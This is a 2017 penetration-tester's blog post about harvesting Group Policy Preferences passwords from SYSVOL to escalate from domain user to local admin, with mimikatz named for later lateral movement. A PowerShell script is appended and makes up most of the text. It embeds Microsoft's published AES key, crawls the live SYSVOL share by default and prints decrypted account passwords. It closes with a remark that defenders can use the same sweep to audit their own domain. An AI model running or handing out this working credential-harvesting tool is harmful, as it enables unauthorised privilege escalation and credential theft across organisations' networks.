March 30, 2017
Lateral Movement Part 1
Scenario: you are a normal user in your company's domain. No admin privileges. Nothing. You can't even install a program on your machine. What if I told you that you can become the local administrator on your machine, and probably on several more in your organization?

I am not able to count the number of things you are able to do as a local admin (evil or non-evil) :-) For this post I am going to demonstrate how to simply move from a normal user to local admin privileges. This is an attack vector I have been using in various security assessments. Time to let the cat out of the bag... haha.

What are Group Policy Preferences passwords?

In a nutshell: sys admins have 100-plus machines on a domain and want to configure all of them the same way, so chances are they use the same local admin password to install programs and configure every machine. They do this through a GPO, using Group Policy Preferences (GPP) to conveniently push the same password to all hosts in the domain: a Local Users and Groups item (Groups.xml), a service (Services.xml), a scheduled task (ScheduledTasks.xml), a data source (DataSources.xml), a printer (Printers.xml) or a mapped drive (Drives.xml). The catch is where that password ends up. It is written into the policy's XML file in SYSVOL as a cpassword attribute, AES-256-encrypted with a key that Microsoft published in the protocol documentation, and SYSVOL is readable by every authenticated domain user. Convenience at the expense of security: how many times do we see that?

Microsoft removed the ability to save new passwords in these items with MS14-025 (May 2014), but the patch does not delete XML files that are already sitting in SYSVOL, so old policies keep leaking until someone cleans them up.

Ways to find the GPP password?

To be honest, countless. But I shall show a few here:

- Manually traversing to \\<domain name>\SYSVOL\<domain name>\Policies. Under each policy GUID, look in Machine\Preferences and User\Preferences for the XML files named above and search them for a non-empty cpassword attribute.

Once you have it, chances are that it is used on most if not all machines in the domain! Think about the lateral movement that is possible, the dumping of passwords: mimikatz, anyone?

That doesn't sound so good for the blue teamers, right? In the next post we are going to see practical ways to mitigate this.

Remember, this is not a new attack vector. The reason I am putting this up is that in all the penetration testing assessments I have been doing, this has been a recurring vulnerability.

https://the-infosec.com/2017/03/26/lateral-movement-part-i/
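As an added example (my code, not the original post's), here is a PowerShell script that automates the SYSVOL traversal described above: it walks \\<domain>\SYSVOL\<domain>\Policies, parses the six preference XML types that can carry a cpassword attribute, and decrypts each one with the AES-256 key Microsoft published in MS-GPPREF section 2.2.1.1.4. The domain name, the -Demo switch, the function names and the sample password "Summer2017!" are all assumptions; -Demo writes a constructed Groups.xml under %TEMP% so the round trip can be exercised without a domain, and the encryptor exists only to build that sample.

```powershell
# Added example, not code from the original post.
# Sweeps SYSVOL for Group Policy Preferences XML files, extracts every
# cpassword attribute and decrypts it with the AES-256 key Microsoft
# published in MS-GPPREF section 2.2.1.1.4. Only read access to SYSVOL is
# needed, which every authenticated domain user has.
param(
    # Assumption: the current user's DNS domain. Override: -Domain corp.example
    [string]$Domain = $env:USERDNSDOMAIN,
    # Hypothetical switch: build a constructed Groups.xml under %TEMP% and scan
    # that instead of SYSVOL, so the script can be tried off a domain
    [switch]$Demo
)

# The published key. It is the same in every domain, which is the whole problem.
$script:GppKey = [byte[]](
    0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    # AES-256-CBC, PKCS7 padding, all-zero IV, as the spec describes
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $script:GppKey
    $aes.IV      = New-Object byte[] 16
    $aes
}

function ConvertFrom-CPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # GPP strips the Base64 '=' padding; restore it before decoding
    $padded = $CPassword + ('=' * ((4 - $CPassword.Length % 4) % 4))
    $cipher = [Convert]::FromBase64String($padded)
    $aes    = New-GppAes
    try {
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
        # The plaintext is the password as UTF-16LE
        [System.Text.Encoding]::Unicode.GetString($plain)
    } finally { $aes.Dispose() }
}

function ConvertTo-CPassword {
    # Inverse operation; used here only to build the constructed demo file
    param([Parameter(Mandatory)][string]$Password)
    $plain = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $aes   = New-GppAes
    try {
        $cipher = $aes.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length)
        [Convert]::ToBase64String($cipher).TrimEnd('=')
    } finally { $aes.Dispose() }
}

function Find-GppPassword {
    param([Parameter(Mandatory)][string]$Root)
    # Preference files that can carry a cpassword attribute
    $names = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Printers.xml','Drives.xml'
    Get-ChildItem -Path $Root -Recurse -Include $names -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_.FullName
        [xml]$doc = Get-Content -LiteralPath $file -Raw
        foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
            $cp = $node.GetAttribute('cpassword')
            if (-not $cp) { continue }   # empty cpassword means no password was set
            # The account attribute is named differently per preference type
            $who = foreach ($a in 'userName','accountName','runAs','username') {
                $v = $node.GetAttribute($a); if ($v) { $v; break }
            }
            [pscustomobject]@{
                File     = $file
                Account  = $who
                NewName  = $node.GetAttribute('newName')
                Password = ConvertFrom-CPassword $cp
            }
        }
    }
}

if ($Demo) {
    # Constructed sample: a Groups.xml that renames the built-in Administrator
    # and sets its password, laid out the way GPP stores it under a policy GUID
    $root = Join-Path $env:TEMP 'gpp-demo\Policies\{00000000-0000-0000-0000-000000000000}\Machine\Preferences\Groups'
    New-Item -ItemType Directory -Path $root -Force | Out-Null
    $cp = ConvertTo-CPassword 'Summer2017!'
    @"
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)">
    <Properties action="U" newName="locadm" cpassword="$cp" changeLogon="0"
      noChange="1" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN"
      userName="Administrator (built-in)"/>
  </User>
</Groups>
"@ | Set-Content -LiteralPath (Join-Path $root 'Groups.xml') -Encoding UTF8
    Find-GppPassword -Root (Join-Path $env:TEMP 'gpp-demo')
} else {
    Find-GppPassword -Root "\\$Domain\SYSVOL\$Domain\Policies"
}
```

Run it with -Demo to watch the round trip on the constructed file (it should print Account "Administrator (built-in)", NewName "locadm", Password "Summer2017!"); without the switch it needs a domain-joined host and walks the real SYSVOL share. The same Find-GppPassword sweep is what a defender runs to audit their own domain: any non-empty cpassword it returns marks a policy that has to be deleted rather than re-saved, since MS14-025 only stopped new passwords from being written.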